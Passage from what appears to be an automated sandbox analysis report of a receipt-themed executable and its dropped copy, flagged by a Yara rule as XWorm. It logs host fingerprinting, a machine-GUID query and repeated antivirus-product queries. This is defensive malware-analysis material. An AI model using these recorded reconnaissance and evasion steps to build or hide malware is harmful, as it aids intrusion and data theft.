            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Users\user\Desktop\Receipt-#202431029B.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Users\user\AppData\Roaming\XetHVID.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Users\user\AppData\Roaming\XetHVID.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp, Receipt-#202431029B.exe, 00000008.00000002.4108966106.0000000007563000.00000004.00000020.00020000.00000000.sdmp, Receipt-#202431029B.exe, 00000008.00000002.4100928252.00000000011C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 9.2.XetHVID.exe.2b7c8f4.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.256e6f0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.257fa9c.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.XetHVID.exe.2b8fa44.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.XetHVID.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.256e6f0.1.raw.unpack, type: UNPACKEDPE
